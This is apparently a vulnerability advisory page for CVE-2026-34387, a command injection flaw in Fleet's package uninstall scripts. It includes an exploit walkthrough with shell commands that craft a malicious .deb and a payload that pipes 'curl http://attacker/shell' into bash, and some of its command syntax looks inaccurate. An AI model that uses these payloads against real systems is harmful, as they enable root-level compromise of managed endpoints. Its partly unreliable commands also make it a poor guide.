Fleet, Command Injection, CVE-2026-34387 (Critical)

Listen to this Post

How CVE-2026-34387 works

Fleet’s software‑installer pipeline automatically extracts metadata (package identifier, product name, etc.) from uploaded .pkg, .deb, .rpm, .exe, or `.msi` files. This metadata is then interpolated into auto‑generated uninstall shell scripts without any sanitisation.
By crafting a malicious package where metadata fields contain command‑injection payloads (e.g. `”&& calc”` or "; id > /tmp/owned"), an attacker can cause the uninstall script to execute arbitrary commands.
When an administrator uploads such a package and later triggers an uninstall on a managed endpoint, the injected commands run with root privileges on macOS/Linux or SYSTEM privileges on Windows.
The attack does not require Fleet credentials; it targets the administrator who uploads the package (e.g. via supply‑chain, typosquatting, or a compromised mirror).
Affected versions: Fleet < 4.81.1. The issue is patched in v4.81.1 by properly escaping metadata before embedding it into uninstall scripts.

dailycve form

Platform: Fleet Device Management
Version: before 4.81.1
Vulnerability: Command Injection
Severity: Critical (CVSS 8.4)
Date: 2026-03-27

Prediction: Patch 2026-03-27

What Undercode Say:

Simulate malicious package metadata injection
(Example: crafting a .deb control file)
echo "Package: malicious-pkg
Version: 1.0
Maintainer: 'test; id > /tmp/owned;'
Description: Exploit" > control
Build the malicious .deb
dpkg-deb --build malicious-pkg
Verify that the injected command appears in the uninstall script
dpkg -I malicious-pkg.deb
Look for the Maintainer field containing the payload
Exploit: after upload, trigger uninstall on a managed host
fleetctl run-script --uninstall --package-id=malicious
The injected 'id > /tmp/owned' executes as root

Exploit

  1. Craft payload in a package metadata field (e.g. Maintainer: 'test; curl http://attacker/shell | bash;').
  2. Upload the malicious package to Fleet (requires admin interaction).
  3. Trigger uninstall of that package on any managed endpoint (via Fleet UI or API).
  4. Gain root/SYSTEM shell or arbitrary code execution on the endpoint.

Protection from this CVE

  • Upgrade to Fleet v4.81.1 or higher – the official patch sanitises all metadata before interpolation.
  • Trusted sources only – never upload packages from untrusted or unverified origins.
  • Manual inspection – if an immediate upgrade is impossible, manually review and edit auto‑generated uninstall scripts before deployment.
  • Network monitoring – watch for unusual outbound connections or command execution logs from the Fleet server.

Impact

  • Privilege escalation – unprivileged commands run as root (Linux/macOS) or SYSTEM (Windows).
  • Full endpoint compromise – attacker can install backdoors, exfiltrate data, pivot to internal networks, or disrupt operations.
  • Supply‑chain risk – any third‑party package with malicious metadata becomes a vector.
  • Persistence – the injected payload can survive re‑installation or be hidden in legitimate packages.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top